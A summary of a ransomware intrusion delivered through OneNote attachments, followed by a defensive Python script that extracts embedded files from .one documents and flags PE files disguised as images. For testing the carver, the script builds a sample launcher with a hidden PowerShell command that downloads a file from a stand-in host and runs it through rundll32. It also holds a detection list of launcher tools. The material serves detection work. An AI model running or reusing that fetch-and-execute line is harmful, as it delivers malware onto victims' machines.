Microsoft OneNote Files Used To Drop Nokoyawa Ransomware
In early 2023 an intrusion began with a phishing campaign delivering emails that carried malicious Microsoft OneNote attachments. Opening the attachment executed an embedded .cmd batch file, which launched PowerShell to download an IcedID DLL disguised as an image file; a scheduled task provided persistence. After 21 days of limited activity, the IcedID infection was used to run discovery with built-in Microsoft tools.

On day 33, Cobalt Strike beacons were deployed, followed by Active Directory discovery and the installation of AnyDesk. The threat actor accessed LSASS memory (a credential-theft step, not reconnaissance), used tools including Task Manager and SoftPerfect Network Scanner, and moved laterally through the environment. They executed the Nokoyawa ransomware on critical servers, exfiltrated data, and attempted to cover their tracks. The intrusion spanned 812 hours of activity over 34 days.
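The initial access chain above (OneNote attachment, embedded .cmd, PowerShell download of a DLL masquerading as an image) can be triaged without opening the file. OneNote .one files store attachments as FileDataStoreObject structures (MS-ONESTORE section 2.6.13): a 16-byte header GUID, an 8-byte little-endian length, 12 bytes of unused/reserved space, then the raw file data. The following is an added example, not code from the original report or the DFIR team: it carves those embedded objects from a .one byte blob, classifies each by its magic bytes and script markers, and separately checks a downloaded file whose name claims an image extension for a PE header. The sample OneNote blob is constructed inline (filler bytes plus two embedded objects); the script text, hostname and file names inside it are invented for illustration.

```python
import hashlib
import os
import struct

# FileDataStoreObject GUIDs from MS-ONESTORE 2.6.13, written in their on-disk
# little-endian byte order: header {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC},
# footer {71FBA722-0F79-4A0B-BB13-899256426B24}.
FILE_DATA_HEADER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")
FILE_DATA_FOOTER = bytes.fromhex("22a7fb71790f0b4abb13899256426b24")
# header(16) + cbLength(8) + unused(4) + reserved(8) = 36 bytes before FileData
FDSO_PREAMBLE = 36

# Strings that mark an embedded object as a launcher rather than a document.
SCRIPT_MARKERS = (b"@echo off", b"powershell", b"cmd.exe", b"rundll32",
                  b"wscript", b"cscript", b"mshta", b"certutil")

IMAGE_MAGIC = {".png": b"\x89PNG", ".jpg": b"\xff\xd8\xff",
               ".jpeg": b"\xff\xd8\xff", ".gif": b"GIF8"}


def extract_embedded_files(blob: bytes):
    """Return [(offset, data)] for every FileDataStoreObject found in blob."""
    found = []
    pos = 0
    while True:
        idx = blob.find(FILE_DATA_HEADER, pos)
        if idx == -1 or idx + FDSO_PREAMBLE > len(blob):
            break
        (length,) = struct.unpack_from("<Q", blob, idx + 16)
        start = idx + FDSO_PREAMBLE
        data = blob[start:start + length]      # truncates if cbLength overruns
        found.append((idx, data))
        pos = start + max(length, 1)
    return found


def classify(data: bytes) -> str:
    """Coarse type by content, independent of any name the file claims."""
    if data[:2] == b"MZ":
        return "pe"
    head = data[:512].lower()
    if any(m in head for m in SCRIPT_MARKERS):
        return "script"
    if data[:8] == b"\x89PNG\r\n\x1a\n" or data[:3] == b"\xff\xd8\xff":
        return "image"
    return "unknown"


def masquerading_pe(filename: str, data: bytes) -> bool:
    """True when an image-named file (e.g. the downloaded DLL) is really a PE."""
    ext = os.path.splitext(filename.lower())[1]
    return ext in IMAGE_MAGIC and data[:2] == b"MZ"


def triage(blob: bytes):
    """Summarise every embedded object: offset, size, kind, sha256."""
    return [{"offset": off, "size": len(d), "kind": classify(d),
             "sha256": hashlib.sha256(d).hexdigest()}
            for off, d in extract_embedded_files(blob)]


def _fdso(data: bytes) -> bytes:
    """Wrap data in a FileDataStoreObject, padding FileData to 8 bytes."""
    pad = (-len(data)) % 8
    return (FILE_DATA_HEADER + struct.pack("<Q", len(data)) + b"\x00" * 12
            + data + b"\x00" * pad + FILE_DATA_FOOTER)


def build_sample_onenote() -> bytes:
    """Constructed stand-in for a malicious .one file (not a real capture)."""
    # Hypothetical launcher: drops a 'png' and runs it as a DLL via rundll32.
    cmd = (b"@echo off\r\n"
           b"powershell -w hidden -c \"iwr http://example.invalid/i.png "
           b"-o %TEMP%\\i.png; rundll32 %TEMP%\\i.png,init\"\r\n")
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 24     # benign decoy image
    return b"\x00" * 64 + _fdso(cmd) + b"\x00" * 16 + _fdso(png)


if __name__ == "__main__":
    for f in triage(build_sample_onenote()):
        print(f)
    print(masquerading_pe("i.png", b"MZ\x90\x00"))
```

A real triage run would feed the bytes of the suspect .one attachment to triage() and treat any "script" or "pe" object as a detonation candidate; masquerading_pe() is the check to apply to whatever the launcher fetches into %TEMP%, since the extension is the only thing pretending it is an image.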